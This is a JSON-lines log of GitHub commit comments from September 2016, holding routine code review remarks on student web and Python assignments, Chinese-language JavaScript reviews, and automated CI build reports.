{"id":"4581233395","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"gsofia/personal-website"},"payload":{"comment":{"id":19073470,"position":31,"line":30,"path":"index.html","commit_id":"e5e73053f94c608525ba7f20dee3f528512f9f83","created_at":"2016-09-19T03:30:21Z","updated_at":"2016-09-19T03:30:21Z","body":"You should reopen the paragraph here with ti's opening tag."}},"created_at":"2016-09-19T03:30:21Z"}
{"id":"4581233422","type":"CommitCommentEvent","actor":{"login":"Pocketkid2"},"repo":{"name":"APDevTeam/iFill"},"payload":{"comment":{"id":19073471,"position":null,"line":null,"path":null,"commit_id":"61fe2304269409f7047a0dc910b76f822f19ce6c","created_at":"2016-09-19T03:30:22Z","updated_at":"2016-09-19T03:30:22Z","body":":thumbsup:"}},"created_at":"2016-09-19T03:30:22Z"}
{"id":"4581233540","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19073474,"position":21,"line":21,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/aes/SparkAesSaslServer.java","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T03:30:25Z","updated_at":"2016-09-19T03:30:25Z","body":"Please add some comments for this newly added class."}},"created_at":"2016-09-19T03:30:25Z"}
{"id":"4581235112","type":"CommitCommentEvent","actor":{"login":"rtlanceroad"},"repo":{"name":"6c37/crux-ports"},"payload":{"comment":{"id":19073479,"position":null,"line":null,"path":null,"commit_id":"358e309bdb9ab01d7aea786b29d608a21033915c","created_at":"2016-09-19T03:31:15Z","updated_at":"2016-09-19T03:31:15Z","body":"Unfortunately, upstream released 0.60 one month ago, but no stable release tarball is avaliable nor git commit in gitweb, so I have to use `git checkout 0.60`."}},"created_at":"2016-09-19T03:31:15Z"}
{"id":"4581236820","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19073482,"position":151,"line":151,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/aes/SparkAesCipher.java","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T03:32:08Z","updated_at":"2016-09-19T03:32:08Z","body":"Error occurred in data decryption."}},"created_at":"2016-09-19T03:32:08Z"}
{"id":"4581237162","type":"CommitCommentEvent","actor":{"login":"ErnestoOT"},"repo":{"name":"ErnestoOT/proyectoandroiduno"},"payload":{"comment":{"id":19073483,"position":null,"line":null,"path":null,"commit_id":"9d1fdb456d72f36afa91fc2278ec435dddb8bf21","created_at":"2016-09-19T03:32:18Z","updated_at":"2016-09-19T03:32:18Z","body":"Buen Día\r\nPor favor revisar mi proyecto. La imagen la consegui del pdf pero observar que no se deforma en la aplicacion cuando cambia a otros entornos o dispositivos. es pequeña eso si."}},"created_at":"2016-09-19T03:32:18Z"}
{"id":"4581239326","type":"CommitCommentEvent","actor":{"login":"ogurin"},"repo":{"name":"ogurin/test"},"payload":{"comment":{"id":19073485,"position":null,"line":null,"path":null,"commit_id":"2e2763a80436737f1ead7aa1735abf674dea9674","created_at":"2016-09-19T03:33:28Z","updated_at":"2016-09-19T03:33:28Z","body":"とくにもんだいなし"}},"created_at":"2016-09-19T03:33:28Z"}
{"id":"4581240394","type":"CommitCommentEvent","actor":{"login":"rshap91"},"repo":{"name":"rshap91/dsp"},"payload":{"comment":{"id":19073489,"position":null,"line":null,"path":null,"commit_id":"afc21ccc72fdd1d7bf800d29b9dba46eb10e2597","created_at":"2016-09-19T03:34:00Z","updated_at":"2016-09-19T03:34:00Z","body":"Thank you for this! I made the corrections in the forked repo.\nOnly confusion is for the front_x(words) question. Instead of\n\n`w.replace('x', '0')`\n\ni put\n\n`w.replace('x', ' ')`\n\nThis seems to have solved it. Are there any other cases where this doesn't\nwork that I might be missing?\n\nThanks again\n\nRick\n\nOn Sun, Sep 18, 2016 at 10:32 PM, Luc Demortier <notifications@github.com>\nwrote:\n\n> RE: 05a-python.md\n> cc: @lucdemortier <https://github.com/lucdemortier> @reshamametis\n> <https://github.com/reshamametis> @aramnath <https://github.com/aramnath>\n> @gfsoileau <https://github.com/gfsoileau> @julialintern\n> <https://github.com/julialintern> @galvin-mj\n> <https://github.com/galvin-mj>\n>\n> Hello @rshap91 <https://github.com/rshap91>\n>\n> Nice work on the Python problems! Here are some comments:\n>\n>    - Q2: There is no concept of order for Python sets. Checking\n>    membership in a set is much faster than in a list, because set elements are\n>    hashable. On the other hand a list is better if you have to step through\n>    each element of the list, one by one.\n>    - Q6: for front_back(a, b), don't forget from math import ceil.\n>    - Q7, front_x(words): You assume that all the strings in words only\n>    contain alphabetical characters, but this is not guaranteed. Thus, if I\n>    apply your function to the list ['xa','ax','-a'], I obtain ['-a',\n>    'xa', 'ax'], which is incorrect.\n>    - Q8: The aim here was to find the team with the smallest difference\n>    between goals for and against it. The answer is Aston_Villa, for which the\n>    difference is 1. You should have taken the absolute value of the difference\n>    :)\n>\n> 👍\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/rshap91/dsp/commit/afc21ccc72fdd1d7bf800d29b9dba46eb10e2597#commitcomment-19073209>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ARMntmz1pj59x2_GZsOIPpIAuZ3Jir6rks5qrfRKgaJpZM4KAGDO>\n> .\n>\n\n\n\n-- \n\nMG ScatCat\n\n*100 My Address Here*\n\n*New York, NY 10025*\n\nO 212.999.9999\n\nC 917.222.2222\n\nme@gmail.com\n"}},"created_at":"2016-09-19T03:34:00Z"}
{"id":"4581241888","type":"CommitCommentEvent","actor":{"login":"gamingluigi"},"repo":{"name":"CoreyBlow/Ruskin"},"payload":{"comment":{"id":19073490,"position":null,"line":null,"path":null,"commit_id":"8b3c5b10c2599380bb4e5310a075ab7811810b22","created_at":"2016-09-19T03:34:50Z","updated_at":"2016-09-19T03:34:50Z","body":"Wow this doesn't seem this hard."}},"created_at":"2016-09-19T03:34:50Z"}
{"id":"4581242868","type":"CommitCommentEvent","actor":{"login":"Gavin-YYC"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19073493,"position":626,"line":626,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T03:35:18Z","updated_at":"2016-09-19T03:35:18Z","body":"为什么总写_this = this，感觉有时候没必要啊 。。"}},"created_at":"2016-09-19T03:35:18Z"}
{"id":"4581244600","type":"CommitCommentEvent","actor":{"login":"llh911001"},"repo":{"name":"llh911001/mostly-adequate-guide-chinese"},"payload":{"comment":{"id":19073497,"position":null,"line":null,"path":null,"commit_id":"a0eac7060d34533881176d7e7d82968e115a9bea","created_at":"2016-09-19T03:36:14Z","updated_at":"2016-09-19T03:36:14Z","body":"#21 "}},"created_at":"2016-09-19T03:36:14Z"}
{"id":"4581245737","type":"CommitCommentEvent","actor":{"login":"lilskippy"},"repo":{"name":"CoreyBlow/Ruskin"},"payload":{"comment":{"id":19073502,"position":null,"line":null,"path":null,"commit_id":"8b3c5b10c2599380bb4e5310a075ab7811810b22","created_at":"2016-09-19T03:36:48Z","updated_at":"2016-09-19T03:36:48Z","body":"suh dude."}},"created_at":"2016-09-19T03:36:48Z"}
{"id":"4581246083","type":"CommitCommentEvent","actor":{"login":"brambledn"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19073504,"position":122,"line":122,"path":"shishuo/line-monitoring-model.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T03:36:59Z","updated_at":"2016-09-19T03:36:59Z","body":"orderInfo 的赋值 貌似没有意义，在后面没有用到，可以直接执行checkAdrRepeat 这个函数而不用赋值；另外checkAdrRepeat这个函数是否真的需要返回值呢？（只在此处用到了，但返回值没有起作用）"}},"created_at":"2016-09-19T03:36:59Z"}
{"id":"4581247094","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19073506,"position":null,"line":null,"path":null,"commit_id":"2048127309864abe0aee1ce0133a17a0c33965ae","created_at":"2016-09-19T03:37:33Z","updated_at":"2016-09-19T03:37:33Z","body":"@CPSC310Bot "}},"created_at":"2016-09-19T03:37:33Z"}
{"id":"4581252660","type":"CommitCommentEvent","actor":{"login":"Xuan27"},"repo":{"name":"neilgibeaut/BandoCat-Transcription"},"payload":{"comment":{"id":19073510,"position":null,"line":null,"path":null,"commit_id":"16f62f2e6924c78c84f76ae0b21558243f3ae3cc","created_at":"2016-09-19T03:40:39Z","updated_at":"2016-09-19T03:40:39Z","body":"This PHP document improves the interface by creating and populating a dropdown for the Mapkind table from a table in the database, instead of a text form in the MapKind table. Therefore, if a new Mapkind is added to the database the dropdown will be modified too."}},"created_at":"2016-09-19T03:40:39Z"}
{"id":"4581255006","type":"CommitCommentEvent","actor":{"login":"Super-Baleine"},"repo":{"name":"muonium/core"},"payload":{"comment":{"id":19073514,"position":56,"line":294,"path":"application/controllers/User.php","commit_id":"8065aaab3799f8872caf9c098d4bd2e7e92fefff","created_at":"2016-09-19T03:42:03Z","updated_at":"2016-09-19T03:42:03Z","body":"base64 or ASCII isn't better ?"}},"created_at":"2016-09-19T03:42:03Z"}
{"id":"4581259632","type":"CommitCommentEvent","actor":{"login":"MaggieLiY"},"repo":{"name":"MaggieLiY/test"},"payload":{"comment":{"id":19073519,"position":2,"line":2,"path":"README.md","commit_id":"0a384b3ec2be68862b78c3e44d1a42e2859fb7af","created_at":"2016-09-19T03:44:41Z","updated_at":"2016-09-19T03:44:41Z","body":"document"}},"created_at":"2016-09-19T03:44:41Z"}
{"id":"4581259964","type":"CommitCommentEvent","actor":{"login":"MaggieLiY"},"repo":{"name":"MaggieLiY/test"},"payload":{"comment":{"id":19073520,"position":null,"line":null,"path":null,"commit_id":"0a384b3ec2be68862b78c3e44d1a42e2859fb7af","created_at":"2016-09-19T03:44:52Z","updated_at":"2016-09-19T03:44:52Z","body":"eee"}},"created_at":"2016-09-19T03:44:52Z"}
{"id":"4581260261","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"tonypatryn/personal-website"},"payload":{"comment":{"id":19073521,"position":30,"line":34,"path":"css/styles.css","commit_id":"6d6ded889789b0f25e2b16d13fc5195692bbb2c7","created_at":"2016-09-19T03:45:02Z","updated_at":"2016-09-19T03:45:02Z","body":"Remember to use !important sparingly, don't think it was needed here since there is nothing overwriting this style."}},"created_at":"2016-09-19T03:45:02Z"}
{"id":"4581261174","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"tonypatryn/personal-website"},"payload":{"comment":{"id":19073522,"position":31,"line":35,"path":"css/styles.css","commit_id":"6d6ded889789b0f25e2b16d13fc5195692bbb2c7","created_at":"2016-09-19T03:45:29Z","updated_at":"2016-09-19T03:45:29Z","body":"Did you need to set this at all? Divs don't typically come with a default float."}},"created_at":"2016-09-19T03:45:29Z"}
{"id":"4581262548","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"tonypatryn/personal-website"},"payload":{"comment":{"id":19073525,"position":6,"line":8,"path":"index.html","commit_id":"6d6ded889789b0f25e2b16d13fc5195692bbb2c7","created_at":"2016-09-19T03:46:14Z","updated_at":"2016-09-19T03:46:14Z","body":"Missing the closing quote marks here (After portfolio)."}},"created_at":"2016-09-19T03:46:14Z"}
{"id":"4581263761","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":19073531,"position":null,"line":null,"path":null,"commit_id":"26b2f4e6f73fa42c1b6504ff825f0717e9b44f37","created_at":"2016-09-19T03:46:54Z","updated_at":"2016-09-19T03:46:54Z","body":"Why is this file not in its proper directory. Its obvious it should at least be in the `src/` folder"}},"created_at":"2016-09-19T03:46:54Z"}
{"id":"4581266715","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"tonypatryn/personal-website"},"payload":{"comment":{"id":19073539,"position":3,"line":5,"path":"index.html","commit_id":"6d6ded889789b0f25e2b16d13fc5195692bbb2c7","created_at":"2016-09-19T03:48:22Z","updated_at":"2016-09-19T03:48:22Z","body":"It's usually safer to put the google fonts stylesheet before your stylesheet to ensure they load."}},"created_at":"2016-09-19T03:48:22Z"}
{"id":"4581267844","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"tonypatryn/personal-website"},"payload":{"comment":{"id":19073541,"position":3,"line":5,"path":"index.html","commit_id":"6d6ded889789b0f25e2b16d13fc5195692bbb2c7","created_at":"2016-09-19T03:48:58Z","updated_at":"2016-09-19T03:48:58Z","body":"It's usually safer to put the google fonts stylesheet before your stylesheet to ensure they load."}},"created_at":"2016-09-19T03:48:58Z"}
{"id":"4581268572","type":"CommitCommentEvent","actor":{"login":"FabioCZ"},"repo":{"name":"jak103/jarvis"},"payload":{"comment":{"id":19073544,"position":32,"line":64,"path":"Jarvis/Grading/GradingResult.cs","commit_id":"2fb212d2ab2ab799b4a2fc660308856a40c4e23d","created_at":"2016-09-19T03:49:23Z","updated_at":"2016-09-19T03:49:23Z","body":"I think the multiplication factor should be reverted to 100 instead of 10. On the latest grade report email, grades.txt reported 10% instead of 100%."}},"created_at":"2016-09-19T03:49:23Z"}
{"id":"4581268951","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"echin6/dsp"},"payload":{"comment":{"id":19073545,"position":null,"line":null,"path":null,"commit_id":"73e9a483d3cd321fe1f8919f3554debb24073c99","created_at":"2016-09-19T03:49:34Z","updated_at":"2016-09-19T03:49:34Z","body":"RE: 05a-python.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @echin6 \r\n\r\nThanks for the `reduce()` example! 👍 \r\n\r\nRegarding `not_bad`: I did not check your new version, as the indentation was eliminated in markdown. When using markdown, insert code between two lines on each of which you put three back ticks. You may also want to commit a new version of the .py file.\r\n\r\nRegarding `linear_merge`: I was told by one of your future colleagues that `sorted()` uses the TIMSORT algorithm, which looks for runs of ascending or descending values in the input list, and that this makes the algorithm linear. So I would imagine that with two input lists, already pre-ordered, TIMSORT would be very efficient indeed. Your new algorithm looks good though! If you want to study this, go to ipython and use the magic %time or %timeit to measure how long a piece of code takes to run.\r\n\r\nBest,\r\n\r\nLuc"}},"created_at":"2016-09-19T03:49:34Z"}
{"id":"4581269151","type":"CommitCommentEvent","actor":{"login":"Blue-Shadow"},"repo":{"name":"rheit/zdoom"},"payload":{"comment":{"id":19073546,"position":null,"line":null,"path":null,"commit_id":"f1ba19073fce4af02298056b93bd78ff16313822","created_at":"2016-09-19T03:49:41Z","updated_at":"2016-09-19T03:49:41Z","body":"> I am sorry if this may break the odd mod out...\r\n\r\nYeah, this affected two of my monsters which rely on passing `damage` in an expression. I updated their code to use `GetMissileDamage()`, though, and all is good."}},"created_at":"2016-09-19T03:49:41Z"}
{"id":"4581271040","type":"CommitCommentEvent","actor":{"login":"Gavin-YYC"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19073550,"position":470,"line":470,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T03:50:40Z","updated_at":"2016-09-19T03:50:40Z","body":"感觉还是写if-else比较好理解，容易看晕了😓"}},"created_at":"2016-09-19T03:50:40Z"}
{"id":"4581273388","type":"CommitCommentEvent","actor":{"login":"xuguangxin"},"repo":{"name":"lizhong1008/libyami-utils"},"payload":{"comment":{"id":19073555,"position":21,"line":125,"path":"tests/yamitranscode.cpp","commit_id":"43a09803ae976e3d1815a4867fc37e5f0804dce3","created_at":"2016-09-19T03:51:58Z","updated_at":"2016-09-19T03:51:58Z","body":"Do we need change this to low case? I think W is little wired from beginning and now we have ow, we’d better make it consistent "}},"created_at":"2016-09-19T03:51:58Z"}
{"id":"4581273863","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19073556,"position":null,"line":null,"path":null,"commit_id":"419db96a175bb4090b6698dcb74a3910ad9ae7ca","created_at":"2016-09-19T03:52:13Z","updated_at":"2016-09-19T03:52:13Z","body":"The purpose is a simplification, I don't care testing this as a tuning at the moment... Will think how to go ahead."}},"created_at":"2016-09-19T03:52:13Z"}
{"id":"4581274473","type":"CommitCommentEvent","actor":{"login":"alanhala"},"repo":{"name":"alanhala/live-drawing-sample"},"payload":{"comment":{"id":19073557,"position":22,"line":25,"path":"app/controllers/drawings_controller.rb","commit_id":"6fa1da501642bf22c3af5ff6f87ccce677e44d65","created_at":"2016-09-19T03:52:34Z","updated_at":"2016-09-19T03:52:34Z","body":"@gnardini Instead of having this query string here, we usually create some kind of \"query objects\" which has the sql string encapsulated and could have a common interface such use execute_query. This also makes your components more testable. You could have specific tests for that query object, and in the controller you only test the input and response for every kind of request."}},"created_at":"2016-09-19T03:52:34Z"}
{"id":"4581274913","type":"CommitCommentEvent","actor":{"login":"Gavin-YYC"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19073560,"position":407,"line":407,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T03:52:49Z","updated_at":"2016-09-19T03:52:49Z","body":"函数名太长了..."}},"created_at":"2016-09-19T03:52:49Z"}
{"id":"4581275043","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"etelem/personal-website"},"payload":{"comment":{"id":19073561,"position":19,"line":15,"path":"index.html","commit_id":"001ab557bedebea9c413feaaca131c6b14d733e9","created_at":"2016-09-19T03:52:53Z","updated_at":"2016-09-19T03:52:53Z","body":"This should be in the `<head>` section."}},"created_at":"2016-09-19T03:52:53Z"}
{"id":"4581276858","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"etelem/personal-website"},"payload":{"comment":{"id":19073565,"position":23,"line":19,"path":"index.html","commit_id":"001ab557bedebea9c413feaaca131c6b14d733e9","created_at":"2016-09-19T03:53:53Z","updated_at":"2016-09-19T03:53:53Z","body":"The quote marks are causing issue with your links. They need to be straight quotes (these are curved :( )."}},"created_at":"2016-09-19T03:53:53Z"}
{"id":"4581277555","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"etelem/personal-website"},"payload":{"comment":{"id":19073569,"position":39,"line":35,"path":"index.html","commit_id":"001ab557bedebea9c413feaaca131c6b14d733e9","created_at":"2016-09-19T03:54:16Z","updated_at":"2016-09-19T03:54:16Z","body":"Missing your alt attribute on this image."}},"created_at":"2016-09-19T03:54:16Z"}
{"id":"4581278586","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"etelem/personal-website"},"payload":{"comment":{"id":19073570,"position":51,"line":51,"path":"style.css","commit_id":"001ab557bedebea9c413feaaca131c6b14d733e9","created_at":"2016-09-19T03:54:47Z","updated_at":"2016-09-19T03:54:47Z","body":"Which element are you styling here??"}},"created_at":"2016-09-19T03:54:47Z"}
{"id":"4581278960","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"etelem/personal-website"},"payload":{"comment":{"id":19073571,"position":52,"line":52,"path":"style.css","commit_id":"001ab557bedebea9c413feaaca131c6b14d733e9","created_at":"2016-09-19T03:54:59Z","updated_at":"2016-09-19T03:54:59Z","body":"Which element are you styling here??"}},"created_at":"2016-09-19T03:54:59Z"}
{"id":"4581280314","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19073575,"position":null,"line":null,"path":null,"commit_id":"21936384b5d896aae4459e6859cbb8a1701dcd5f","created_at":"2016-09-19T03:55:40Z","updated_at":"2016-09-19T03:55:40Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-19T03:55:40Z"}
{"id":"4581280612","type":"CommitCommentEvent","actor":{"login":"alanhala"},"repo":{"name":"alanhala/live-drawing-sample"},"payload":{"comment":{"id":19073576,"position":22,"line":25,"path":"app/controllers/drawings_controller.rb","commit_id":"6fa1da501642bf22c3af5ff6f87ccce677e44d65","created_at":"2016-09-19T03:55:49Z","updated_at":"2016-09-19T03:55:49Z","body":"Maybe in this case you could have a drawing builder which receives a set of points and returns a Drawing. What do you think?"}},"created_at":"2016-09-19T03:55:49Z"}
{"id":"4581280869","type":"CommitCommentEvent","actor":{"login":"elecalion"},"repo":{"name":"roxma/vim-tweak"},"payload":{"comment":{"id":19073578,"position":5,"line":9,"path":"autoload/tweak/wtb_switch.vim","commit_id":"53e8e54748ab22e3b93617d3122facde77616120","created_at":"2016-09-19T03:55:59Z","updated_at":"2016-09-19T03:55:59Z","body":"If the purpose of this function is to judge whether there is multi tabpage, I think tabpagenr(\"$\") will do so.\r\n\r\nIs there any other consideration? Thx."}},"created_at":"2016-09-19T03:55:59Z"}
{"id":"4581281884","type":"CommitCommentEvent","actor":{"login":"unknownbrackets"},"repo":{"name":"hrydgard/ppsspp"},"payload":{"comment":{"id":19073580,"position":null,"line":null,"path":null,"commit_id":"175f3316e0c7131d050c7dda765cbfe7f42544ac","created_at":"2016-09-19T03:56:33Z","updated_at":"2016-09-19T03:56:33Z","body":"The reporting code sees \"v1.3.0.1\" the same basically as \"v1.3-1-g0000000\".  Should be fine, but just noting.\r\n\r\nAlso, \"v1.3.0.1-2-g0000000\" is parsed the same as \"v1.3-102-g0000000\".  Again, maybe not perfect but there are only so many digits.  Anyway, hopefully we can avoid such complicated version numbers as \"v1.3.0.1-2-g000000\" or going to more than 5 numbers....\r\n\r\n-[Unknown]"}},"created_at":"2016-09-19T03:56:33Z"}
{"id":"4581283809","type":"CommitCommentEvent","actor":{"login":"shonumi"},"repo":{"name":"shonumi/gbe-plus"},"payload":{"comment":{"id":19073585,"position":null,"line":null,"path":null,"commit_id":"6bc8daee3fa6671d4f45e736e694b108a39e1050","created_at":"2016-09-19T03:57:35Z","updated_at":"2016-09-19T03:57:35Z","body":"Shouldn't actually make a difference, but just in case some game uses a palette besides 0xE4, or for homebrew, the correct palette supplied by the GB Printer is now used."}},"created_at":"2016-09-19T03:57:35Z"}
{"id":"4581288944","type":"CommitCommentEvent","actor":{"login":"manzkyxd"},"repo":{"name":"manzkyxd/notes-app"},"payload":{"comment":{"id":19073590,"position":null,"line":null,"path":null,"commit_id":"38ae0e19daa737c016eb19fb12a4ce19cedeed85","created_at":"2016-09-19T04:00:19Z","updated_at":"2016-09-19T04:00:19Z","body":"Hello !\r\nthis is another branch."}},"created_at":"2016-09-19T04:00:19Z"}
{"id":"4581289333","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19073591,"position":null,"line":null,"path":null,"commit_id":"20d838693d6a71197a08495add3993f4ec39ce53","created_at":"2016-09-19T04:00:28Z","updated_at":"2016-09-19T04:00:28Z","body":"ASIHPValidation (shenb) - x86_64-MacOS-10.9-clang: OK (2325 of 2330 tests passed, 0 test warnings)\n\n * 5 tests had: EIO diffs.\n * 4 tests had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 4 tests had: ZSZ big diffs.\n * 5 tests had: Table big diffs.\n * 4 tests had: AUD diffs.\n * 4 tests had: ERR diffs.\n * 1 test had: ESO small diffs.\n * 2 tests had: MTD diffs.\n * 1 test had: RDD diffs.\n * 3 tests had: MTR big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-20d838693d6a71197a08495add3993f4ec39ce53-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-20d838693d6a71197a08495add3993f4ec39ce53-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.79%25-yellow.svg)</a> \n"}},"created_at":"2016-09-19T04:00:28Z"}
{"id":"4581290223","type":"CommitCommentEvent","actor":{"login":"gizzmojr"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19073593,"position":null,"line":null,"path":null,"commit_id":"e79c0749e270116d54e4a3759bd75a5fa8374ab7","created_at":"2016-09-19T04:00:56Z","updated_at":"2016-09-19T04:00:56Z","body":"Every JIRA/Agile screenshot of a KANBAN showed rounded corner cards. I had it at 5 and felt like you might not notice, so upped to 8. 3px seems too low. "}},"created_at":"2016-09-19T04:00:56Z"}
{"id":"4581292022","type":"CommitCommentEvent","actor":{"login":"waddlesplash"},"repo":{"name":"mgba-emu/mgba"},"payload":{"comment":{"id":19073595,"position":null,"line":null,"path":null,"commit_id":"103673423b1a88bf9a0a7417d0acd7ae1eaee8f7","created_at":"2016-09-19T04:01:57Z","updated_at":"2016-09-19T04:01:57Z","body":"Isn't there some way to use `windeployqt` to get a list of static libraries instead of dynamic ones?"}},"created_at":"2016-09-19T04:01:57Z"}
{"id":"4581292514","type":"CommitCommentEvent","actor":{"login":"mfaywu"},"repo":{"name":"mfaywu/job-search-tool"},"payload":{"comment":{"id":19073596,"position":null,"line":null,"path":null,"commit_id":"b2d6f2e01e931728a94bb305e447927174c9edf6","created_at":"2016-09-19T04:02:14Z","updated_at":"2016-09-19T04:02:14Z","body":"#19 Added edit form"}},"created_at":"2016-09-19T04:02:14Z"}
{"id":"4581293612","type":"CommitCommentEvent","actor":{"login":"endrift"},"repo":{"name":"mgba-emu/mgba"},"payload":{"comment":{"id":19073600,"position":null,"line":null,"path":null,"commit_id":"103673423b1a88bf9a0a7417d0acd7ae1eaee8f7","created_at":"2016-09-19T04:02:51Z","updated_at":"2016-09-19T04:02:51Z","body":"Does windeployqt even work with CMake projects?"}},"created_at":"2016-09-19T04:02:51Z"}
{"id":"4581297029","type":"CommitCommentEvent","actor":{"login":"weflossdaily"},"repo":{"name":"weflossdaily/guild-of-dungeoneering"},"payload":{"comment":{"id":19073603,"position":null,"line":null,"path":null,"commit_id":"18e3626fe75ce50761db923dd730b85f270d09e5","created_at":"2016-09-19T04:04:17Z","updated_at":"2016-09-19T04:04:17Z","body":"Scripts run without error now"}},"created_at":"2016-09-19T04:04:17Z"}
{"id":"4581297142","type":"CommitCommentEvent","actor":{"login":"DahaiJarvis"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19073604,"position":171,"line":171,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T04:04:21Z","updated_at":"2016-09-19T04:04:21Z","body":"设置地图缩放级别和中心只要一次就够了，传进的参数是多个坐标也不合适"}},"created_at":"2016-09-19T04:04:21Z"}
{"id":"4581299106","type":"CommitCommentEvent","actor":{"login":"weflossdaily"},"repo":{"name":"weflossdaily/guild-of-dungeoneering"},"payload":{"comment":{"id":19073608,"position":null,"line":null,"path":null,"commit_id":"18e3626fe75ce50761db923dd730b85f270d09e5","created_at":"2016-09-19T04:05:24Z","updated_at":"2016-09-19T04:05:24Z","body":"and by deduce, autocorrect means dedupe"}},"created_at":"2016-09-19T04:05:24Z"}
{"id":"4581304454","type":"CommitCommentEvent","actor":{"login":"mfaywu"},"repo":{"name":"mfaywu/job-search-tool"},"payload":{"comment":{"id":19073613,"position":null,"line":null,"path":null,"commit_id":"77ad6adf21227fac351013262dd0271f86b780f3","created_at":"2016-09-19T04:08:36Z","updated_at":"2016-09-19T04:08:36Z","body":"#16 Done!"}},"created_at":"2016-09-19T04:08:36Z"}
{"id":"4581306222","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19073615,"position":null,"line":null,"path":null,"commit_id":"b27643ee0b4de2ff4f2fd41eab69cdb768c844ec","created_at":"2016-09-19T04:09:42Z","updated_at":"2016-09-19T04:09:42Z","body":"Wow,gratz)))"}},"created_at":"2016-09-19T04:09:42Z"}
{"id":"4581307105","type":"CommitCommentEvent","actor":{"login":"mmdz"},"repo":{"name":"mmdz/tp1-circulos"},"payload":{"comment":{"id":19073617,"position":null,"line":null,"path":null,"commit_id":"bcc2217c1b546e08dbfb8d95b82e5d11df415ab0","created_at":"2016-09-19T04:10:14Z","updated_at":"2016-09-19T04:10:14Z","body":"cambios para entrega"}},"created_at":"2016-09-19T04:10:14Z"}
{"id":"4581308369","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"echin6/dsp"},"payload":{"comment":{"id":19073618,"position":null,"line":null,"path":null,"commit_id":"83a21e5b9e118bb6e252661408c41565cbb9d927","created_at":"2016-09-19T04:11:01Z","updated_at":"2016-09-19T04:11:01Z","body":"RE: 05b-python_advanced.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @echin6\r\n\r\n- To detect identical values: use regular expressions! The solutions to the problems will be provided later, so hopefully this will help.\r\n- When you write\r\n```\r\nlast_dict_sorted = {k: last_dict[k] for k in sorted(last_dict.keys())}\r\n```\r\nyou are still defining a dictionary (unordered!). So maybe try:\r\n```\r\nlast_dict_sorted = [(k, last_dict[k]) for k in sorted(last_dict.keys())]\r\n```"}},"created_at":"2016-09-19T04:11:01Z"}
